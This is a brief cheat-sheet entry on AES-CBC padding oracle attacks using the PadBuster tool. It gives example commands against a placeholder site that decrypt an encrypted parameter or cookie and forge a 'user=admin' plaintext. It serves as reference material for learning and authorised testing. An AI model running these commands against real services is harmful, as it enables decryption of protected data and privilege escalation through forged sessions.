AES-CBC Padding Oracle Attack
Last modified: 2022-12-10
Cryptography
PadBuster
PadBuster is automated script for performing Padding Oracle attacks. It’s useful to decrypt AES.
padbuster <url> <encrypted sample> <block size> [options]
Belows are some examples.
# Encrypted Sample -> 2hN2bBPw==
# 16 -> Block site
# -encoding: 0->Base64, 1->Lower Hex, 2->Upper Hex, 3->NET UrlToken, 4->WebSafe Base64
padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw== 16 -encoding 0
# -cookies: specify cookie value
padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw=="
# -plaintext: specify plain text
padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw==" -plaintext "user=admin"